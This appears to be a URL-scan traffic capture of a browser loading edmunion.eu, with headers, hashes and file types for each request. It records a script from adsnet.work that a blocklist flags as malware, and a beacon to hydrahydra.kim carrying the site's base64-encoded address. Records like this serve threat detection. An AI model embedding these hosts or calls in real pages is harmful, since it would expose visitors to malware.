alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 7884, version 1.0\012- data
Size:   7884
Md5:    9212f6f9860f9fc6c69b02fedf6db8c3
Sha1:   ac6d71b4d5fdd2b3dabc9a06ff6c001e4251da0b
Sha256: 7d93459d86585bfcdbb7e0376056226adb25821ee54b96236fe2123e9560929f
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /scripts/placer.js HTTP/1.1 
Host: adsnet.work
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://www.edmunion.eu/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         193.3.19.36
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/7.4.26
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  ASCII text
Size:   377
Md5:    4435b6168b6acda2edea1c16ab2d857a
Sha1:   eff2c42517e44a568b5011125b5cba022f27f67f
Sha256: dcd5ff0b5118befd94a04b7bbc750b5a7b473e39fefd81e235f79bd848916569

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/uploads/2018/03/cropped-logo-32x32.png HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 1681
Last-Modified: Sat, 03 Mar 2018 16:39:51 GMT
Connection: keep-alive
ETag: "5a9acfd7-691"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced\012- data
Size:   1681
Md5:    788986c804d445568b96be4b71820091
Sha1:   fed718b9e66802553c7899b3583ae1113d957eb0
Sha256: 51db5276a3d5864bf2beb7bf7b24fc13b8cf204ce330196f419f0b74a268cfa7
                                        
                                            GET /wp-content/uploads/2018/03/cropped-logo-192x192.png HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 18794
Last-Modified: Sat, 03 Mar 2018 16:39:51 GMT
Connection: keep-alive
ETag: "5a9acfd7-496a"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced\012- data
Size:   18794
Md5:    6aa4847324d12a67dc4bb794f4a93c50
Sha1:   0e15294f75e1ef538c34a5ab3ec82f11976cc921
Sha256: b457d86b3b74e45e53bbe488fb69961c3664383cbb65ad694fe9b2985c7703ca
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "938899F21FDF4E477F02C6F7F32CBED05BB1DF35E3B221C3A37E8C214B2DC946"
Last-Modified: Thu, 03 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15040
Expires: Sat, 05 Nov 2022 00:53:02 GMT
Date: Fri, 04 Nov 2022 20:42:22 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "938899F21FDF4E477F02C6F7F32CBED05BB1DF35E3B221C3A37E8C214B2DC946"
Last-Modified: Thu, 03 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15040
Expires: Sat, 05 Nov 2022 00:53:02 GMT
Date: Fri, 04 Nov 2022 20:42:22 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "938899F21FDF4E477F02C6F7F32CBED05BB1DF35E3B221C3A37E8C214B2DC946"
Last-Modified: Thu, 03 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15040
Expires: Sat, 05 Nov 2022 00:53:02 GMT
Date: Fri, 04 Nov 2022 20:42:22 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "938899F21FDF4E477F02C6F7F32CBED05BB1DF35E3B221C3A37E8C214B2DC946"
Last-Modified: Thu, 03 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15040
Expires: Sat, 05 Nov 2022 00:53:02 GMT
Date: Fri, 04 Nov 2022 20:42:22 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "938899F21FDF4E477F02C6F7F32CBED05BB1DF35E3B221C3A37E8C214B2DC946"
Last-Modified: Thu, 03 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=15040
Expires: Sat, 05 Nov 2022 00:53:02 GMT
Date: Fri, 04 Nov 2022 20:42:22 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3a631333-54a4-458c-b54b-2dd96d4ede5a.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 11188
x-amzn-requestid: 72e0a128-e0c4-4a93-8e29-01a574b2d1c3
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bC0XNHPcoAMFkNQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6364342d-341a40d37b7bcc9153749d67;Sampled=0
x-amzn-remapped-date: Thu, 03 Nov 2022 21:35:41 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: eo3FBGjoivBN1-4xP1UiTocKbLd87acRtOX2AQrPr1a4yDboDrXYRA==
via: 1.1 da5952aa802df39905ceb16592e9698a.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Thu, 03 Nov 2022 21:53:38 GMT
age: 82124
etag: "29ca25963b777fd7463c65d8cde6d65172c996e1"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11188
Md5:    5aedde5b1d003651d773c89833460868
Sha1:   29ca25963b777fd7463c65d8cde6d65172c996e1
Sha256: 04b95b954d7d992e6547d05d052c6f3f8a4cfb4a5988f9e6c6629969053bf7b3
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F08eaa5d0-649d-4568-ac8b-ca60d91ab718.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7703
x-amzn-requestid: 4f835957-6df6-4001-9c34-ed9749000b46
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bC0RpFGwoAMF0-g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6364340a-3f7b7dd36cb07d057b64ec2f;Sampled=0
x-amzn-remapped-date: Thu, 03 Nov 2022 21:35:06 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: DknsakNef7SUQhERTPiLozTDA4tl1OEdE8ohicMEfVGvwaLwPX8d_Q==
via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 d01e7742f82df0bbc1fb681d709ed69c.cloudfront.net (CloudFront), 1.1 google
date: Thu, 03 Nov 2022 21:54:49 GMT
age: 82053
etag: "d4d2ee1aa9beb5bbd19aaaf590c8a0832fb180cd"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7703
Md5:    9a763d44e05fa357713a41ab1388974a
Sha1:   d4d2ee1aa9beb5bbd19aaaf590c8a0832fb180cd
Sha256: f351b7e90e5435af071892b62af3ac591bc553281b3ea63b1ae067a3d03f572d
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F98808735-da09-4166-b898-eee474b2aed2.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 10810
x-amzn-requestid: 85c9096f-2671-4f0e-94a3-607254d036d8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bC057E5yIAMFcXw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6364350c-3c93b6e56e6141a63d1285eb;Sampled=0
x-amzn-remapped-date: Thu, 03 Nov 2022 21:39:24 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: i3Kso77aQ6Qt3z3KH189niLwWzWFJz7Y0aMQngNRahdqlMAo76WksQ==
via: 1.1 49b94a8674d6e86a841d6523f7dbaf14.cloudfront.net (CloudFront), 1.1 32d624dbeb2a8b7f24dbe49007e37c90.cloudfront.net (CloudFront), 1.1 google
date: Thu, 03 Nov 2022 21:52:42 GMT
age: 82180
etag: "8191eb019b21bed2b9f53c755e1c24d08dc70760"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10810
Md5:    c472942cb4b85610a3e83edf7527f923
Sha1:   8191eb019b21bed2b9f53c755e1c24d08dc70760
Sha256: 0dc7f9902567b0130c1c34b6e356b8239f8e6c83e1d38ac9b74588270000279c
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3d05e3a2-b178-419f-90de-a1985765ff09.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6557
x-amzn-requestid: f2e39db1-fb8a-4a9b-8a1d-ee08000ddeb6
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bC1VyFHuIAMF5Eg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-636435be-7a03ef677f8dbd680f72de90;Sampled=0
x-amzn-remapped-date: Thu, 03 Nov 2022 21:42:22 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: OI-hzSDTy-vFSFOZxI98XT8VZmnpFlU_cobzCTkrn4T5NuH8cqybMg==
via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 0d4ebcaa87ba94709def0eaac9371e5a.cloudfront.net (CloudFront), 1.1 google
date: Thu, 03 Nov 2022 21:52:32 GMT
age: 82190
etag: "594e5a82ce82fb4cd76548b6d2d6b4cc419b7e4c"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6557
Md5:    ca6c7517d7015fbc35fa290c1c2d6afd
Sha1:   594e5a82ce82fb4cd76548b6d2d6b4cc419b7e4c
Sha256: a746b36be50209915a0e5657abd219aab382eee4b7556142aa1316daf3a9f5a4
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3494b1e3-ddc8-454c-8b43-e70e2d8f07b8.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 11421
x-amzn-requestid: 8436166b-f342-44e9-9a31-e25dcaa7b85c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: a2gEOEYRIAMFQ2g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-635f46e7-0616a6b95503fffd4f597509;Sampled=0
x-amzn-remapped-date: Mon, 31 Oct 2022 03:54:15 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: g3OtcJnT2JfzIAvUjoLvC8pOzfwGFQ-M0cH4uwNSVcr2T9jYgCihTw==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 2324edbcb8fc72f617442c65f36a40fc.cloudfront.net (CloudFront), 1.1 google
date: Thu, 03 Nov 2022 23:36:56 GMT
age: 75926
etag: "f7705fcd2d91ce90c58e79324cce1e3abba6c1c8"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11421
Md5:    2ae2b8d827fb2c8bef64febcd36f1645
Sha1:   f7705fcd2d91ce90c58e79324cce1e3abba6c1c8
Sha256: 2dc55e97ef3a85fccb104b80161a8bac16b12d37527c336563677432584c7ad5
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1cdc7f46-586b-486f-968f-5fe03bbb41a9.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7601
x-amzn-requestid: bec1a71e-c5bd-4332-ac60-18b49304a5a3
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: a275aEHYoAMFwlA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-635f736f-1b36c60a43415790430fbecf;Sampled=0
x-amzn-remapped-date: Mon, 31 Oct 2022 07:04:15 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: MORvkZWLXGvSFYxjnSiYJluJY302y_FTvACRUrEvo7vLYkheyEcE1g==
via: 1.1 2dc111aa3ead15d061e41a423155a53a.cloudfront.net (CloudFront), 1.1 2ab6211e66998c8b58132661a7e3cade.cloudfront.net (CloudFront), 1.1 google
date: Fri, 04 Nov 2022 07:18:27 GMT
age: 48235
etag: "c721a00ae618e6ed997e102fa3d977ef830cac05"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7601
Md5:    ae1ac87f2e6534322ba259d6e06fcaa5
Sha1:   c721a00ae618e6ed997e102fa3d977ef830cac05
Sha256: 2f4cab8b925f6a79ed96b08edc00f04186d33ed9cfd4ba565884a931e83ae408
                                        
                                            GET /fetch.php?tracker=adsnet.work&site=aHR0cDovL3d3dy5lZG11bmlvbi5ldS8= HTTP/1.1 
Host: hydrahydra.kim
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         193.3.19.36
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Fri, 04 Nov 2022 20:42:23 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/7.4.26
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa936c143-4ac1-4c0f-a7c9-35638fe066ce.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 3559
x-amzn-requestid: 63f00dbe-834f-4fbb-91c0-5e5378dc48aa
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bC0SvEOaIAMFRBg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63643411-43380b3457de631756afdb81;Sampled=0
x-amzn-remapped-date: Thu, 03 Nov 2022 21:35:13 GMT
x-amz-cf-pop: SEA19-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: hit7lhSIgTngtNcj0qlMHVtdtjSdfA6-lP8QBAyhVJfqyS-PaMHNkw==
via: 1.1 ef6538ee7be7b17c84d06edb0f4c0a1a.cloudfront.net (CloudFront), 1.1 89791e6b21b9a30cc51cac1bc51cf098.cloudfront.net (CloudFront), 1.1 google
date: Thu, 03 Nov 2022 22:00:51 GMT
etag: "b71b29860aca017ac124fb4037cec5dc3101474e"
age: 81698
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   3559
Md5:    3e2c2868516a60c335361ccef89c6090
Sha1:   b71b29860aca017ac124fb4037cec5dc3101474e
Sha256: 3ac5d5410a9d31317c2f31fe3e08cdb188e26bfffce5275b85cce986f2841d22
                                        
                                            GET /css?family=Arimo%3A400%2C400i%2C700%2C700i&subset=latin%2Clatin-ext HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://www.edmunion.eu/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Fri, 04 Nov 2022 20:42:21 GMT
date: Fri, 04 Nov 2022 20:42:21 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /css?family=Montserrat%3A100%2C200%2C300%2C300i%2C400%2C400i%2C500%2C600%2C700%2C800%2C900&subset=latin%2Clatin-ext HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://www.edmunion.eu/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Fri, 04 Nov 2022 20:42:21 GMT
date: Fri, 04 Nov 2022 20:42:21 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /css?family=Poppins%3A300%2C400%2C500%2C600%2C700&subset=latin%2Clatin-ext HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://www.edmunion.eu/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Fri, 04 Nov 2022 20:42:21 GMT
date: Fri, 04 Nov 2022 20:42:21 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
